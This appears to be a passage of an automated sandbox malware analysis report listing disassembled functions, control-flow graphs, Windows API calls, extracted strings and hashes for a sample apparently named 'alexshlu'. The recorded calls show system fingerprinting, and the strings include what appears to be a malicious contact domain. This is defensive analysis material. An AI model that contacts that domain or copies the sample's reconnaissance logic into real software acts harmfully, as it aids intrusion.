                                                                                                                                                                                                                                        control_flow_graph 9 436f90-436fb8 10 436fc0-437006 9->10 10->10 11 437008-43701f 10->11 12 437020-43705b 11->12 12->12 13 43705d-43709a 12->13 14 4370a0-4370b2 13->14 14->14 15 4370b4-4370cd 14->15 17 4370d7-4370e2 15->17 18 4370cf 15->18 19 4370f0-437122 17->19 18->17 19->19 20 437124-43717b CoCreateInstance 19->20 21 437181-4371b2 20->21 22 437526-437556 call 43ce00 GetVolumeInformationW 20->22 23 4371c0-4371d4 21->23 27 437560-437562 22->27 28 437558-43755c 22->28 23->23 26 4371d6-437200 SysAllocString 23->26 33 437516-437522 SysFreeString 26->33 34 437206-437220 CoSetProxyBlanket 26->34 29 437587-43758e 27->29 28->27 31 437590-437597 29->31 32 4375a7-4375bf 29->32 31->32 35 437599-4375a5 31->35 36 4375c0-4375d4 32->36 33->22 37 437226-43723a 34->37 38 43750c-437512 34->38 35->32 36->36 39 4375d6-43760f 36->39 40 437240-437261 37->40 38->33 41 437610-437650 39->41 40->40 42 437263-4372e3 SysAllocString 40->42 41->41 43 437652-43767f call 41dc20 41->43 44 4372f0-437313 42->44 49 437680-437688 43->49 44->44 45 437315-43733e SysAllocString 44->45 50 437344-437366 45->50 51 4374fa-43750a SysFreeString * 2 45->51 49->49 52 43768a-43768c 49->52 59 4374f0-4374f6 50->59 60 43736c-43736f 50->60 51->38 53 437692-4376a2 call 408070 52->53 54 437570-437581 52->54 53->54 54->29 56 4376a7-4376ae 54->56 59->51 60->59 61 437375-43737a 60->61 61->59 62 437380-4373c8 VariantInit 61->62 63 4373d0-4373e4 62->63 63->63 64 4373e6-4373f4 63->64 65 4373f8-4373fa 64->65 66 437400-437406 65->66 67 4374df-4374ec VariantClear 65->67 66->67 68 43740c-43741a 66->68 67->59 69 437467 68->69 70 43741c-437421 68->70 72 437469-4374a2 call 407ff0 call 408e90 69->72 71 437446-43744a 70->71 73 437430-437438 71->73 74 43744c-437455 71->74 83 4374a4 72->83 84 4374a9-4374b1 72->84 76 43743b-437444 73->76 77 437457-43745a 74->77 78 43745c-437460 74->78 76->71 76->72 77->76 78->76 80 437462-437465 78->80 80->76 83->84 85 4374b3 84->85 86 4374b8-4374db call 408020 call 408000 84->86 85->86 86->67
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(.'()), ref: 00437385
                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(.'()), ref: 004374E0
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00437504
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0043750A
                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                        • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                                                                                                                                                                                                                        • API String ID: 2573436264-264043890
                                                                                                                                                                                                                                        • Opcode ID: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                                                                                                                                                                                        • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96
                                                                                                                                                                                                                                        Function 0040E2A9 Relevance: 14.0, APIs: 2, Strings: 7, Instructions: 529COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 214 40e2a9-40e2d1 call 4097b0 CoUninitialize 217 40e2e0-40e2f4 214->217 217->217 218 40e2f6-40e307 217->218 219 40e310-40e331 218->219 219->219 220 40e333-40e38e 219->220 221 40e390-40e3aa 220->221 221->221 222 40e3ac-40e3bd 221->222 223 40e3db-40e3e3 222->223 224 40e3bf-40e3cf 222->224 226 40e3e5-40e3e6 223->226 227 40e3fb-40e405 223->227 225 40e3d0-40e3d9 224->225 225->223 225->225 228 40e3f0-40e3f9 226->228 229 40e407-40e40b 227->229 230 40e41b-40e423 227->230 228->227 228->228 231 40e410-40e419 229->231 232 40e425-40e426 230->232 233 40e43b-40e445 230->233 231->230 231->231 234 40e430-40e439 232->234 235 40e447-40e44b 233->235 236 40e45b-40e467 233->236 234->233 234->234 237 40e450-40e459 235->237 238 40e481-40e5b7 236->238 239 40e469-40e46b 236->239 237->236 237->237 241 40e5c0-40e5d8 238->241 240 40e470-40e47d 239->240 240->240 243 40e47f 240->243 241->241 242 40e5da-40e5fb 241->242 244 40e600-40e628 242->244 243->238 244->244 245 40e62a-40e68f call 40b6a0 call 4097b0 CoUninitialize 244->245 250 40e690-40e6a4 245->250 250->250 251 40e6a6-40e6b8 250->251 252 40e6c0-40e6e1 251->252 252->252 253 40e6e3-40e73e 252->253 254 40e740-40e75a 253->254 254->254 255 40e75c-40e76d 254->255 256 40e77b-40e783 255->256 257 40e76f 255->257 258 40e785-40e786 256->258 259 40e79b-40e7a5 256->259 260 40e770-40e779 257->260 261 40e790-40e799 258->261 262 40e7a7-40e7ab 259->262 263 40e7bb-40e7c3 259->263 260->256 260->260 261->259 261->261 264 40e7b0-40e7b9 262->264 265 40e7c5-40e7c6 263->265 266 40e7db-40e7e5 263->266 264->263 264->264 267 40e7d0-40e7d9 265->267 268 40e7e7-40e7eb 266->268 269 40e7fb-40e807 266->269 267->266 267->267 270 40e7f0-40e7f9 268->270 271 40e821-40e948 269->271 272 40e809-40e80b 269->272 270->269 270->270 273 40e950-40e96a 271->273 274 40e810-40e81d 272->274 273->273 275 40e96c-40e98f 273->275 274->274 276 40e81f 274->276 277 40e990-40e9b9 275->277 276->271 277->277 278 40e9bb-40e9e2 call 40b6a0 277->278 280 40e9e7-40e9fd 278->280
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                                                                        • String ID: "# `$,$I~$`~$lev-tolstoi.com$qx$s
                                                                                                                                                                                                                                        • API String ID: 3861434553-2978658354
                                                                                                                                                                                                                                        • Opcode ID: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                                                                                                                                                                        • Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57
                                                                                                                                                                                                                                        Function 004233A0 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 471COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 281 4233a0-4233ef 282 4233f0-423402 281->282 282->282 283 423404-423445 282->283 285 423450-42347c 283->285 285->285 286 42347e-423488 285->286 287 423610-42361d 286->287 288 423600-423607 286->288 289 4234c6 286->289 290 4234d7-4234e3 286->290 291 4234e4-4234f5 286->291 292 4237d5-42387f 286->292 293 4237ba 286->293 294 4237a8-4237b2 286->294 295 4234ce-4234d4 call 408000 286->295 296 42348f-423495 286->296 301 423626 287->301 302 42361f-423624 287->302 288->287 289->295 299 4234f7-4234fc 291->299 300 4234fe 291->300 297 423880-42389c 292->297 294->293 295->290 303 423497-42349c 296->303 304 42349e 296->304 297->297 307 42389e-4238ae call 4215f0 297->307 309 423500-423537 call 407ff0 299->309 300->309 305 42362d-4236d9 call 407ff0 301->305 302->305 306 4234a1-4234bf call 407ff0 303->306 304->306 319 4236e0-423724 305->319 306->287 306->288 306->289 306->290 306->291 306->292 306->293 306->294 306->295 317 4238b3-4238b6 307->317 318 423540-423585 309->318 323 4238be-4238db 317->323 318->318 320 423587-42358f 318->320 319->319 321 423726-42372e 319->321 324 4235b1-4235bd 320->324 325 423591-423596 320->325 326 423730-423737 321->326 327 423751-423761 321->327 328 4238e0-423904 323->328 330 4235e1-4235ec call 43d6c0 324->330 331 4235bf-4235c3 324->331 329 4235a0-4235af 325->329 332 423740-42374f 326->332 333 423763-423767 327->333 334 423781-4237a1 GetLogicalDrives call 43d6c0 327->334 328->328 335 423906-423989 328->335 329->324 329->329 342 4235f1-4235f9 330->342 337 4235d0-4235df 331->337 332->327 332->332 339 423770-42377f 333->339 334->290 334->293 334->294 334->295 334->323 345 4237c0-4237c6 call 408000 334->345 346 4239f1-4239f7 call 408000 334->346 347 4239eb 334->347 348 4237cf 334->348 336 423990-4239be 335->336 336->336 341 4239c0-4239e3 call 421270 336->341 337->330 337->337 339->334 339->339 341->347 342->287 342->288 342->292 342->293 342->294 342->323 342->345 345->348 347->346 348->292
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                                                                                                                                                                                                                        • API String ID: 0-788320361
                                                                                                                                                                                                                                        • Opcode ID: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                                                                                                                                                                        • Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B
                                                                                                                                                                                                                                        Function 0042BFDA Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 461COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 354 42bfda-42c03f call 43ce00 358 42c040-42c06c 354->358 358->358 359 42c06e-42c078 358->359 360 42c07a-42c083 359->360 361 42c09d 359->361 363 42c090-42c099 360->363 362 42c09f-42c0ac 361->362 364 42c0cb-42c13a call 43ce00 GetComputerNameExA 362->364 365 42c0ae-42c0b5 362->365 363->363 366 42c09b 363->366 371 42c140-42c167 364->371 367 42c0c0-42c0c9 365->367 366->362 367->364 367->367 371->371 372 42c169-42c173 371->372 373 42c175-42c17f 372->373 374 42c18d 372->374 376 42c180-42c189 373->376 375 42c18f-42c19c 374->375 378 42c1bb-42c20f GetComputerNameExA 375->378 379 42c19e-42c1a5 375->379 376->376 377 42c18b 376->377 377->375 381 42c210-42c252 378->381 380 42c1b0-42c1b9 379->380 380->378 380->380 381->381 382 42c254-42c25e 381->382 383 42c260-42c267 382->383 384 42c27b-42c288 382->384 385 42c270-42c279 383->385 386 42c28a-42c291 384->386 387 42c2ab-42c2ff 384->387 385->384 385->385 388 42c2a0-42c2a9 386->388 390 42c300-42c324 387->390 388->387 388->388 390->390 391 42c326-42c330 390->391 392 42c332-42c339 391->392 393 42c34b-42c358 391->393 394 42c340-42c349 392->394 395 42c35a-42c361 393->395 396 42c37b-42c3d6 call 43ce00 393->396 394->393 394->394 397 42c370-42c379 395->397 401 42c3e0-42c3fa 396->401 397->396 397->397 401->401 402 42c3fc-42c406 401->402 403 42c41b-42c42f 402->403 404 42c408-42c40f 402->404 405 42c572-42c5b1 403->405 406 42c435-42c43c 403->406 407 42c410-42c419 404->407 409 42c5c0-42c5e7 405->409 408 42c440-42c44a 406->408 407->403 407->407 410 42c460-42c466 408->410 411 42c44c-42c451 408->411 409->409 412 42c5e9-42c5fb 409->412 414 42c490-42c49e 410->414 415 42c468-42c46b 410->415 413 42c510-42c516 411->413 416 42c61b-42c61e call 430520 412->416 417 42c5fd-42c604 412->417 423 42c518-42c51e 413->423 420 42c4a4-42c4a7 414->420 421 42c52a-42c533 414->421 415->414 418 42c46d-42c483 415->418 425 42c623-42c643 416->425 419 42c610-42c619 417->419 418->413 419->416 419->419 420->421 424 42c4ad-42c50e 420->424 427 42c535-42c537 421->427 428 42c539-42c53c 421->428 423->405 426 42c520-42c522 423->426 424->413 426->408 431 42c528 426->431 427->423 429 42c56e-42c570 428->429 430 42c53e-42c56c 428->430 429->413 430->413 431->405
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042C0D7
                                                                                                                                                                                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                                                                                                                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ComputerName$FreeLibrary
                                                                                                                                                                                                                                        • String ID: x$Wu
                                                                                                                                                                                                                                        • API String ID: 2243422189-1677337568
                                                                                                                                                                                                                                        • Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                                                                                                                                                                                        • Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57
                                                                                                                                                                                                                                        Function 0040A960 Relevance: 9.2, Strings: 7, Instructions: 401COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 432 40a960-40a989 433 40a990-40a9e5 432->433 433->433 434 40a9e7-40aadf 433->434 435 40aae0-40ab1b 434->435 435->435 436 40ab1d-40ab39 435->436 437 40ab40-40ab69 436->437 437->437 438 40ab6b-40ab7a call 40b6a0 437->438 440 40ab7f-40ab86 438->440 441 40ae29-40ae32 440->441 442 40ab8c-40ab98 440->442 443 40aba0-40abb2 442->443 443->443 444 40abb4-40abb9 443->444 445 40abc0-40abcc 444->445 446 40abd3-40abe4 445->446 447 40abce-40abd1 445->447 448 40ae20-40ae26 call 439b60 446->448 449 40abea-40abff 446->449 447->445 447->446 448->441 451 40ac00-40ac41 449->451 451->451 453 40ac43-40ac50 451->453 454 40ac52-40ac58 453->454 455 40ac84-40ac88 453->455 458 40ac67-40ac6b 454->458 456 40ae1e 455->456 457 40ac8e-40acb6 455->457 456->448 460 40acc0-40acf4 457->460 458->456 459 40ac71-40ac78 458->459 461 40ac7a-40ac7c 459->461 462 40ac7e 459->462 460->460 463 40acf6-40acff 460->463 461->462 464 40ac60-40ac65 462->464 465 40ac80-40ac82 462->465 466 40ad01-40ad0b 463->466 467 40ad34-40ad36 463->467 464->455 464->458 465->464 469 40ad17-40ad1b 466->469 467->456 468 40ad3c-40ad52 467->468 470 40ad60-40adb2 468->470 469->456 471 40ad21-40ad28 469->471 470->470 472 40adb4-40adbe 470->472 473 40ad2a-40ad2c 471->473 474 40ad2e 471->474 475 40adc0-40adc8 472->475 476 40adf4-40adf8 472->476 473->474 477 40ad10-40ad15 474->477 478 40ad30-40ad32 474->478 479 40add7-40addb 475->479 480 40adfe-40ae1c call 40a6d0 476->480 477->467 477->469 478->477 479->456 481 40addd-40ade4 479->481 480->448 483 40ade6-40ade8 481->483 484 40adea-40adec 481->484 483->484 486 40add0-40add5 484->486 487 40adee-40adf2 484->487 486->479 488 40adfa-40adfc 486->488 487->486 488->456 488->480
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                                                                                                                                                                                                                        • API String ID: 0-490458541
                                                                                                                                                                                                                                        • Opcode ID: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                                                                                                                                                                        • Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B
                                                                                                                                                                                                                                        Function 0040CE55 Relevance: 9.0, Strings: 7, Instructions: 275COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 489 40ce55-40ce62 490 40ce70-40ce9b 489->490 490->490 491 40ce9d-40ced5 call 408720 call 436f90 490->491 496 40cee0-40cf06 491->496 496->496 497 40cf08-40cf6b 496->497 498 40cf70-40cfa7 497->498 498->498 499 40cfa9-40cfba 498->499 500 40cfc0-40cfcb 499->500 501 40d03d 499->501 503 40cfd0-40cfd9 500->503 502 40d041-40d049 501->502 504 40d05b-40d068 502->504 505 40d04b-40d04f 502->505 503->503 506 40cfdb 503->506 508 40d06a-40d071 504->508 509 40d08b-40d093 504->509 507 40d050-40d059 505->507 506->502 507->504 507->507 510 40d080-40d089 508->510 511 40d095-40d096 509->511 512 40d0ab-40d1c6 509->512 510->509 510->510 513 40d0a0-40d0a9 511->513 514 40d1d0-40d215 512->514 513->512 513->513 514->514 515 40d217-40d239 514->515 516 40d240-40d250 515->516 516->516 517 40d252-40d27f call 40b6a0 516->517 519 40d284-40d29e 517->519
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 3DEF27CA3EABD68D23D904AF30EFEBBC$F^$I@$N~ :$VgfW$lev-tolstoi.com$z@(
                                                                                                                                                                                                                                        • API String ID: 0-3009054237
                                                                                                                                                                                                                                        • Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                                                                                                                                                                        • Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96
                                                                                                                                                                                                                                        Function 004087F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 520 4087f0-4087fe call 43afd0 523 408804-40880b call 434680 520->523 524 408979-40897b ExitProcess 520->524 527 408811-408849 GetCurrentProcessId GetCurrentThreadId 523->527 528 408974 call 43b400 523->528 530 408851-4088d6 GetForegroundWindow 527->530 531 40884b-40884f 527->531 528->524 532 408950-408968 call 409cc0 530->532 533 4088d8-40894e 530->533 531->530 532->528 536 40896a call 40cdf0 532->536 533->532 538 40896f call 40b670 536->538 538->528
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                                                                                                                        • String ID: YO9W
                                                                                                                                                                                                                                        • API String ID: 3118123366-386669604
                                                                                                                                                                                                                                        • Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                                                                                                                                                                                        • Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9
                                                                                                                                                                                                                                        Function 0040C36E Relevance: 6.5, Strings: 5, Instructions: 203COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 600 40c36e-40c559 601 40c560-40c58e 600->601 601->601 602 40c590-40c7ab 601->602 604 40c7b0-40c7de 602->604 604->604 605 40c7e0-40c7e8 604->605 606 40c7ec-40c7ff 605->606
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ){+}$4cde$CJ$F'k)$GS
                                                                                                                                                                                                                                        • API String ID: 0-4192230409
                                                                                                                                                                                                                                        • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                                                                                                                                                                        • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96
                                                                                                                                                                                                                                        Function 0042C6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 607 42c6d7-42c6ff 608 42c700-42c74f 607->608 608->608 609 42c751-42c761 608->609 610 42c763-42c76f 609->610 611 42c77b-42c787 609->611 612 42c770-42c779 610->612 613 42c7a1-42c803 call 43ce00 call 41dc20 611->613 614 42c789-42c78b 611->614 612->611 612->612 622 42c810-42c82a 613->622 615 42c790-42c79d 614->615 615->615 617 42c79f 615->617 617->613 622->622 623 42c82c-42c85f 622->623 624 42c860-42c886 623->624 624->624 625 42c888-42c892 624->625 626 42c894-42c89b 625->626 627 42c8ab-42c8b3 625->627 628 42c8a0-42c8a9 626->628 629 42c8b5-42c8b6 627->629 630 42c8cb-42c8d8 627->630 628->627 628->628 631 42c8c0-42c8c9 629->631 632 42c8da-42c8e1 630->632 633 42c8fb-42c946 630->633 631->630 631->631 634 42c8f0-42c8f9 632->634 635 42c950-42c978 633->635 634->633 634->634 635->635 636 42c97a-42c984 635->636 637 42c986-42c98f 636->637 638 42c99b-42c9a5 636->638 641 42c990-42c999 637->641 639 42c9a7-42c9ab 638->639 640 42c9bb-42ca35 638->640 642 42c9b0-42c9b9 639->642 643 42cad8-42cb04 640->643 641->638 641->641 642->640 642->642 644 42cb10-42cb60 643->644 644->644 645 42cb62-42cb72 644->645 646 42cb74-42cb76 645->646 647 42cb8b-42cb97 645->647 648 42cb80-42cb89 646->648 649 42cbb1-42cbf7 call 43ce00 GetPhysicallyInstalledSystemMemory call 41dc20 647->649 650 42cb99-42cb9b 647->650 648->647 648->648 656 42cbfc-42cc13 649->656 651 42cba0-42cbad 650->651 651->651 654 42cbaf 651->654 654->649 657 42cc20-42cc3a 656->657 657->657 658 42cc3c-42cc6f 657->658 659 42cc70-42cc96 658->659 659->659 660 42cc98-42cca2 659->660 661 42cca4-42ccab 660->661 662 42ccbb-42ccc3 660->662 663 42ccb0-42ccb9 661->663 664 42ccc5-42ccc6 662->664 665 42ccdb-42cce8 662->665 663->662 663->663 666 42ccd0-42ccd9 664->666 667 42ccea-42ccf1 665->667 668 42cd0b-42cd56 665->668 666->665 666->666 670 42cd00-42cd09 667->670 669 42cd60-42cd88 668->669 669->669 671 42cd8a-42cd98 669->671 670->668 670->670 672 42cd9a-42cda1 671->672 673 42cdbb-42cdc5 671->673 674 42cdb0-42cdb9 672->674 675 42ca40-42cad5 673->675 676 42cdcb 673->676 674->673 674->674 675->643 677 42cdd0-42cdd9 676->677 677->677 678 42cddb 677->678 678->675
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: '$iJ
                                                                                                                                                                                                                                        • API String ID: 0-30662343
                                                                                                                                                                                                                                        • Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                                                                                                                                                                                        • Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97
